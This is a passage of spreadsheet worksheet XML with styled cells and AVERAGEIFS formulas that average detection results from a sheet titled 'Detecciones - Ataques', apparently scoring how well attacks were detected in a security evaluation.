      <c r="AW188" s="512"/>
      <c r="AX188" s="512"/>
      <c r="AY188" s="512"/>
      <c r="AZ188" s="512"/>
      <c r="BA188" s="512"/>
      <c r="BB188" s="512"/>
      <c r="BC188" s="512"/>
      <c r="BD188" s="512"/>
      <c r="BE188" s="512"/>
      <c r="BF188" s="512"/>
      <c r="BG188" s="512"/>
      <c r="BH188" s="512"/>
      <c r="BI188" s="512"/>
      <c r="BJ188" s="512"/>
      <c r="BK188" s="512"/>
      <c r="BL188" s="512"/>
      <c r="BM188" s="512"/>
      <c r="BN188" s="512"/>
      <c r="BO188" s="512"/>
      <c r="BP188" s="512"/>
      <c r="BQ188" s="512"/>
      <c r="BR188" s="512"/>
      <c r="BS188" s="512"/>
      <c r="BT188" s="512"/>
      <c r="BU188" s="512"/>
      <c r="BV188" s="512"/>
      <c r="BW188" s="512"/>
      <c r="BX188" s="512"/>
      <c r="BY188" s="512"/>
      <c r="BZ188" s="512"/>
      <c r="CA188" s="512"/>
      <c r="CB188" s="512"/>
      <c r="CC188" s="512"/>
      <c r="CD188" s="512"/>
      <c r="CE188" s="512"/>
      <c r="CF188" s="512"/>
      <c r="CG188" s="512"/>
      <c r="CH188" s="512"/>
      <c r="CI188" s="512"/>
      <c r="CJ188" s="512"/>
      <c r="CK188" s="512"/>
      <c r="CL188" s="512"/>
      <c r="CM188" s="512"/>
      <c r="CN188" s="512"/>
      <c r="CO188" s="512"/>
      <c r="CP188" s="512"/>
      <c r="CQ188" s="512"/>
      <c r="CR188" s="512"/>
      <c r="CS188" s="512"/>
      <c r="CT188" s="512"/>
      <c r="CU188" s="512"/>
      <c r="CV188" s="512"/>
      <c r="CW188" s="512"/>
      <c r="CX188" s="512"/>
      <c r="CY188" s="512"/>
      <c r="CZ188" s="512"/>
      <c r="DA188" s="512"/>
      <c r="DB188" s="512"/>
      <c r="DC188" s="512"/>
      <c r="DD188" s="512"/>
      <c r="DE188" s="512"/>
      <c r="DF188" s="512"/>
      <c r="DG188" s="512"/>
      <c r="DH188" s="512"/>
      <c r="DI188" s="512"/>
      <c r="DJ188" s="512"/>
      <c r="DK188" s="271"/>
    </row>
    <row r="189">
      <c r="K189" s="173"/>
      <c r="N189" s="173"/>
      <c r="Q189" s="271"/>
      <c r="R189" s="510"/>
      <c r="S189" s="510"/>
      <c r="T189" s="510"/>
      <c r="U189" s="510"/>
      <c r="V189" s="510"/>
      <c r="W189" s="510"/>
      <c r="X189" s="271"/>
      <c r="Y189" s="271"/>
      <c r="Z189" s="271"/>
      <c r="AA189" s="271"/>
      <c r="AB189" s="271"/>
      <c r="AC189" s="271"/>
      <c r="AD189" s="271"/>
      <c r="AE189" s="271"/>
      <c r="AF189" s="271"/>
      <c r="AG189" s="271"/>
      <c r="AH189" s="352" t="s">
        <v>1726</v>
      </c>
      <c r="AI189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS189" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT189" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU189" s="512"/>
      <c r="AV189" s="512"/>
      <c r="AW189" s="512"/>
      <c r="AX189" s="512"/>
      <c r="AY189" s="512"/>
      <c r="AZ189" s="512"/>
      <c r="BA189" s="512"/>
      <c r="BB189" s="512"/>
      <c r="BC189" s="512"/>
      <c r="BD189" s="512"/>
      <c r="BE189" s="512"/>
      <c r="BF189" s="512"/>
      <c r="BG189" s="512"/>
      <c r="BH189" s="512"/>
      <c r="BI189" s="512"/>
      <c r="BJ189" s="512"/>
      <c r="BK189" s="512"/>
      <c r="BL189" s="512"/>
      <c r="BM189" s="512"/>
      <c r="BN189" s="512"/>
      <c r="BO189" s="512"/>
      <c r="BP189" s="512"/>
      <c r="BQ189" s="512"/>
      <c r="BR189" s="512"/>
      <c r="BS189" s="512"/>
      <c r="BT189" s="512"/>
      <c r="BU189" s="512"/>
      <c r="BV189" s="512"/>
      <c r="BW189" s="512"/>
      <c r="BX189" s="512"/>
      <c r="BY189" s="512"/>
      <c r="BZ189" s="512"/>
      <c r="CA189" s="512"/>
      <c r="CB189" s="512"/>
      <c r="CC189" s="512"/>
      <c r="CD189" s="512"/>
      <c r="CE189" s="512"/>
      <c r="CF189" s="512"/>
      <c r="CG189" s="512"/>
      <c r="CH189" s="512"/>
      <c r="CI189" s="512"/>
      <c r="CJ189" s="512"/>
      <c r="CK189" s="512"/>
      <c r="CL189" s="512"/>
      <c r="CM189" s="512"/>
      <c r="CN189" s="512"/>
      <c r="CO189" s="512"/>
      <c r="CP189" s="512"/>
      <c r="CQ189" s="512"/>
      <c r="CR189" s="512"/>
      <c r="CS189" s="512"/>
      <c r="CT189" s="512"/>
      <c r="CU189" s="512"/>
      <c r="CV189" s="512"/>
      <c r="CW189" s="512"/>
      <c r="CX189" s="512"/>
      <c r="CY189" s="512"/>
      <c r="CZ189" s="512"/>
      <c r="DA189" s="512"/>
      <c r="DB189" s="512"/>
      <c r="DC189" s="512"/>
      <c r="DD189" s="512"/>
      <c r="DE189" s="512"/>
      <c r="DF189" s="512"/>
      <c r="DG189" s="512"/>
      <c r="DH189" s="512"/>
      <c r="DI189" s="512"/>
      <c r="DJ189" s="512"/>
      <c r="DK189" s="271"/>
    </row>
    <row r="190">
      <c r="K190" s="173"/>
      <c r="N190" s="173"/>
      <c r="Q190" s="271"/>
      <c r="R190" s="510"/>
      <c r="S190" s="510"/>
      <c r="T190" s="510"/>
      <c r="U190" s="510"/>
      <c r="V190" s="510"/>
      <c r="W190" s="510"/>
      <c r="X190" s="271"/>
      <c r="Y190" s="271"/>
      <c r="Z190" s="271"/>
      <c r="AA190" s="271"/>
      <c r="AB190" s="271"/>
      <c r="AC190" s="271"/>
      <c r="AD190" s="271"/>
      <c r="AE190" s="271"/>
      <c r="AF190" s="271"/>
      <c r="AG190" s="271"/>
      <c r="AH190" s="352" t="s">
        <v>822</v>
      </c>
      <c r="AI190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="AK190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AL190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AM190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="AN190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="AO190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AP190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AQ190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="AR190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0</v>
      </c>
      <c r="AS190" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AT190" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AU190" s="512"/>
      <c r="AV190" s="512"/>
      <c r="AW190" s="512"/>
      <c r="AX190" s="512"/>
      <c r="AY190" s="512"/>
      <c r="AZ190" s="512"/>
      <c r="BA190" s="512"/>
      <c r="BB190" s="512"/>
      <c r="BC190" s="512"/>
      <c r="BD190" s="512"/>
      <c r="BE190" s="512"/>
      <c r="BF190" s="512"/>
      <c r="BG190" s="512"/>
      <c r="BH190" s="512"/>
      <c r="BI190" s="512"/>
      <c r="BJ190" s="512"/>
      <c r="BK190" s="512"/>
      <c r="BL190" s="512"/>
      <c r="BM190" s="512"/>
      <c r="BN190" s="512"/>
      <c r="BO190" s="512"/>
      <c r="BP190" s="512"/>
      <c r="BQ190" s="512"/>
      <c r="BR190" s="512"/>
      <c r="BS190" s="512"/>
      <c r="BT190" s="512"/>
      <c r="BU190" s="512"/>
      <c r="BV190" s="512"/>
      <c r="BW190" s="512"/>
      <c r="BX190" s="512"/>
      <c r="BY190" s="512"/>
      <c r="BZ190" s="512"/>
      <c r="CA190" s="512"/>
      <c r="CB190" s="512"/>
      <c r="CC190" s="512"/>
      <c r="CD190" s="512"/>
      <c r="CE190" s="512"/>
      <c r="CF190" s="512"/>
      <c r="CG190" s="512"/>
      <c r="CH190" s="512"/>
      <c r="CI190" s="512"/>
      <c r="CJ190" s="512"/>
      <c r="CK190" s="512"/>
      <c r="CL190" s="512"/>
      <c r="CM190" s="512"/>
      <c r="CN190" s="512"/>
      <c r="CO190" s="512"/>
      <c r="CP190" s="512"/>
      <c r="CQ190" s="512"/>
      <c r="CR190" s="512"/>
      <c r="CS190" s="512"/>
      <c r="CT190" s="512"/>
      <c r="CU190" s="512"/>
      <c r="CV190" s="512"/>
      <c r="CW190" s="512"/>
      <c r="CX190" s="512"/>
      <c r="CY190" s="512"/>
      <c r="CZ190" s="512"/>
      <c r="DA190" s="512"/>
      <c r="DB190" s="512"/>
      <c r="DC190" s="512"/>
      <c r="DD190" s="512"/>
      <c r="DE190" s="512"/>
      <c r="DF190" s="512"/>
      <c r="DG190" s="512"/>
      <c r="DH190" s="512"/>
      <c r="DI190" s="512"/>
      <c r="DJ190" s="512"/>
      <c r="DK190" s="271"/>
    </row>
    <row r="191">
      <c r="K191" s="173"/>
      <c r="N191" s="173"/>
      <c r="Q191" s="271"/>
      <c r="R191" s="510"/>
      <c r="S191" s="510"/>
      <c r="T191" s="510"/>
      <c r="U191" s="510"/>
      <c r="V191" s="510"/>
      <c r="W191" s="510"/>
      <c r="X191" s="271"/>
      <c r="Y191" s="271"/>
      <c r="Z191" s="271"/>
      <c r="AA191" s="271"/>
      <c r="AB191" s="271"/>
      <c r="AC191" s="271"/>
      <c r="AD191" s="271"/>
      <c r="AE191" s="271"/>
      <c r="AF191" s="271"/>
      <c r="AG191" s="271"/>
      <c r="AH191" s="352" t="s">
        <v>445</v>
      </c>
      <c r="AI191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS191" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT191" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU191" s="512"/>
      <c r="AV191" s="512"/>
      <c r="AW191" s="512"/>
      <c r="AX191" s="512"/>
      <c r="AY191" s="512"/>
      <c r="AZ191" s="512"/>
      <c r="BA191" s="512"/>
      <c r="BB191" s="512"/>
      <c r="BC191" s="512"/>
      <c r="BD191" s="512"/>
      <c r="BE191" s="512"/>
      <c r="BF191" s="512"/>
      <c r="BG191" s="512"/>
      <c r="BH191" s="512"/>
      <c r="BI191" s="512"/>
      <c r="BJ191" s="512"/>
      <c r="BK191" s="512"/>
      <c r="BL191" s="512"/>
      <c r="BM191" s="512"/>
      <c r="BN191" s="512"/>
      <c r="BO191" s="512"/>
      <c r="BP191" s="512"/>
      <c r="BQ191" s="512"/>
      <c r="BR191" s="512"/>
      <c r="BS191" s="512"/>
      <c r="BT191" s="512"/>
      <c r="BU191" s="512"/>
      <c r="BV191" s="512"/>
      <c r="BW191" s="512"/>
      <c r="BX191" s="512"/>
      <c r="BY191" s="512"/>
      <c r="BZ191" s="512"/>
      <c r="CA191" s="512"/>
      <c r="CB191" s="512"/>
      <c r="CC191" s="512"/>
      <c r="CD191" s="512"/>
      <c r="CE191" s="512"/>
      <c r="CF191" s="512"/>
      <c r="CG191" s="512"/>
      <c r="CH191" s="512"/>
      <c r="CI191" s="512"/>
      <c r="CJ191" s="512"/>
      <c r="CK191" s="512"/>
      <c r="CL191" s="512"/>
      <c r="CM191" s="512"/>
      <c r="CN191" s="512"/>
      <c r="CO191" s="512"/>
      <c r="CP191" s="512"/>
      <c r="CQ191" s="512"/>
      <c r="CR191" s="512"/>
      <c r="CS191" s="512"/>
      <c r="CT191" s="512"/>
      <c r="CU191" s="512"/>
      <c r="CV191" s="512"/>
      <c r="CW191" s="512"/>
      <c r="CX191" s="512"/>
      <c r="CY191" s="512"/>
      <c r="CZ191" s="512"/>
      <c r="DA191" s="512"/>
      <c r="DB191" s="512"/>
      <c r="DC191" s="512"/>
      <c r="DD191" s="512"/>
      <c r="DE191" s="512"/>
      <c r="DF191" s="512"/>
      <c r="DG191" s="512"/>
      <c r="DH191" s="512"/>
      <c r="DI191" s="512"/>
      <c r="DJ191" s="512"/>
      <c r="DK191" s="271"/>
    </row>
    <row r="192">
      <c r="K192" s="173"/>
      <c r="N192" s="173"/>
      <c r="Q192" s="271"/>
      <c r="R192" s="510"/>
      <c r="S192" s="510"/>
      <c r="T192" s="510"/>
      <c r="U192" s="510"/>
      <c r="V192" s="510"/>
      <c r="W192" s="510"/>
      <c r="X192" s="271"/>
      <c r="Y192" s="271"/>
      <c r="Z192" s="271"/>
      <c r="AA192" s="271"/>
      <c r="AB192" s="271"/>
      <c r="AC192" s="271"/>
      <c r="AD192" s="271"/>
      <c r="AE192" s="271"/>
      <c r="AF192" s="271"/>
      <c r="AG192" s="271"/>
      <c r="AH192" s="352" t="s">
        <v>1747</v>
      </c>
      <c r="AI192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="AK192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="AL192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="AM192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="AN192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="AO192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="AP192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="AR192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="AS192" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="AT192" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="AU192" s="512"/>
      <c r="AV192" s="512"/>
      <c r="AW192" s="512"/>
      <c r="AX192" s="512"/>
      <c r="AY192" s="512"/>
      <c r="AZ192" s="512"/>
      <c r="BA192" s="512"/>
      <c r="BB192" s="512"/>
      <c r="BC192" s="512"/>
      <c r="BD192" s="512"/>
      <c r="BE192" s="512"/>
      <c r="BF192" s="512"/>
      <c r="BG192" s="512"/>
      <c r="BH192" s="512"/>
      <c r="BI192" s="512"/>
      <c r="BJ192" s="512"/>
      <c r="BK192" s="512"/>
      <c r="BL192" s="512"/>
      <c r="BM192" s="512"/>
      <c r="BN192" s="512"/>
      <c r="BO192" s="512"/>
      <c r="BP192" s="512"/>
      <c r="BQ192" s="512"/>
      <c r="BR192" s="512"/>
      <c r="BS192" s="512"/>
      <c r="BT192" s="512"/>
      <c r="BU192" s="512"/>
      <c r="BV192" s="512"/>
      <c r="BW192" s="512"/>
      <c r="BX192" s="512"/>
      <c r="BY192" s="512"/>
      <c r="BZ192" s="512"/>
      <c r="CA192" s="512"/>
      <c r="CB192" s="512"/>
      <c r="CC192" s="512"/>
      <c r="CD192" s="512"/>
      <c r="CE192" s="512"/>
      <c r="CF192" s="512"/>
      <c r="CG192" s="512"/>
      <c r="CH192" s="512"/>
      <c r="CI192" s="512"/>
      <c r="CJ192" s="512"/>
      <c r="CK192" s="512"/>
      <c r="CL192" s="512"/>
      <c r="CM192" s="512"/>
      <c r="CN192" s="512"/>
      <c r="CO192" s="512"/>
      <c r="CP192" s="512"/>
      <c r="CQ192" s="512"/>
      <c r="CR192" s="512"/>
      <c r="CS192" s="512"/>
      <c r="CT192" s="512"/>
      <c r="CU192" s="512"/>
      <c r="CV192" s="512"/>
      <c r="CW192" s="512"/>
      <c r="CX192" s="512"/>
      <c r="CY192" s="512"/>
      <c r="CZ192" s="512"/>
      <c r="DA192" s="512"/>
      <c r="DB192" s="512"/>
      <c r="DC192" s="512"/>
      <c r="DD192" s="512"/>
      <c r="DE192" s="512"/>
      <c r="DF192" s="512"/>
      <c r="DG192" s="512"/>
      <c r="DH192" s="512"/>
      <c r="DI192" s="512"/>
      <c r="DJ192" s="512"/>
      <c r="DK192" s="271"/>
    </row>
    <row r="193">
      <c r="K193" s="173"/>
      <c r="N193" s="173"/>
      <c r="Q193" s="271"/>
      <c r="R193" s="510"/>
      <c r="S193" s="510"/>
      <c r="T193" s="510"/>
      <c r="U193" s="510"/>
      <c r="V193" s="510"/>
      <c r="W193" s="510"/>
      <c r="X193" s="271"/>
      <c r="Y193" s="271"/>
      <c r="Z193" s="271"/>
      <c r="AA193" s="271"/>
      <c r="AB193" s="271"/>
      <c r="AC193" s="271"/>
      <c r="AD193" s="271"/>
      <c r="AE193" s="271"/>
      <c r="AF193" s="271"/>
      <c r="AG193" s="271"/>
      <c r="AH193" s="352" t="s">
        <v>989</v>
      </c>
      <c r="AI193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AK193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AL193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AM193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AN193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AO193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AP193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AR193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AS193" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AT193" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="AU193" s="271"/>
      <c r="AV193" s="271"/>
      <c r="AW193" s="271"/>
      <c r="AX193" s="271"/>
      <c r="AY193" s="271"/>
      <c r="AZ193" s="271"/>
      <c r="BA193" s="271"/>
      <c r="BB193" s="271"/>
      <c r="BC193" s="271"/>
      <c r="BD193" s="271"/>
      <c r="BE193" s="271"/>
      <c r="BF193" s="271"/>
      <c r="BG193" s="271"/>
      <c r="BH193" s="271"/>
      <c r="BI193" s="271"/>
      <c r="BJ193" s="271"/>
      <c r="BK193" s="271"/>
      <c r="BL193" s="271"/>
      <c r="BM193" s="271"/>
      <c r="BN193" s="271"/>
      <c r="BO193" s="271"/>
      <c r="BP193" s="271"/>
      <c r="BQ193" s="271"/>
      <c r="BR193" s="271"/>
      <c r="BS193" s="271"/>
      <c r="BT193" s="271"/>
      <c r="BU193" s="271"/>
      <c r="BV193" s="271"/>
      <c r="BW193" s="271"/>
      <c r="BX193" s="271"/>
      <c r="BY193" s="271"/>
      <c r="BZ193" s="271"/>
      <c r="CA193" s="271"/>
      <c r="CB193" s="271"/>
      <c r="CC193" s="271"/>
      <c r="CD193" s="271"/>
      <c r="CE193" s="271"/>
      <c r="CF193" s="271"/>
      <c r="CG193" s="271"/>
      <c r="CH193" s="271"/>
      <c r="CI193" s="271"/>
      <c r="CJ193" s="271"/>
      <c r="CK193" s="271"/>
      <c r="CL193" s="271"/>
      <c r="CM193" s="271"/>
      <c r="CN193" s="271"/>
      <c r="CO193" s="271"/>
      <c r="CP193" s="271"/>
      <c r="CQ193" s="271"/>
      <c r="CR193" s="271"/>
      <c r="CS193" s="271"/>
      <c r="CT193" s="271"/>
      <c r="CU193" s="271"/>
      <c r="CV193" s="271"/>
      <c r="CW193" s="271"/>
      <c r="CX193" s="271"/>
      <c r="CY193" s="271"/>
      <c r="CZ193" s="271"/>
      <c r="DA193" s="271"/>
      <c r="DB193" s="271"/>
      <c r="DC193" s="271"/>
      <c r="DD193" s="271"/>
      <c r="DE193" s="271"/>
      <c r="DF193" s="271"/>
      <c r="DG193" s="271"/>
      <c r="DH193" s="271"/>
      <c r="DI193" s="271"/>
      <c r="DJ193" s="271"/>
      <c r="DK193" s="271"/>
    </row>
    <row r="194">
      <c r="K194" s="173"/>
      <c r="N194" s="173"/>
      <c r="Q194" s="271"/>
      <c r="R194" s="510"/>
      <c r="S194" s="510"/>
      <c r="T194" s="510"/>
      <c r="U194" s="510"/>
      <c r="V194" s="510"/>
      <c r="W194" s="510"/>
      <c r="X194" s="271"/>
      <c r="Y194" s="271"/>
      <c r="Z194" s="271"/>
      <c r="AA194" s="271"/>
      <c r="AB194" s="271"/>
      <c r="AC194" s="271"/>
      <c r="AD194" s="271"/>
      <c r="AE194" s="271"/>
      <c r="AF194" s="271"/>
      <c r="AG194" s="271"/>
      <c r="AH194" s="352" t="s">
        <v>246</v>
      </c>
      <c r="AI194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="AK194" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="AL194" s="518">
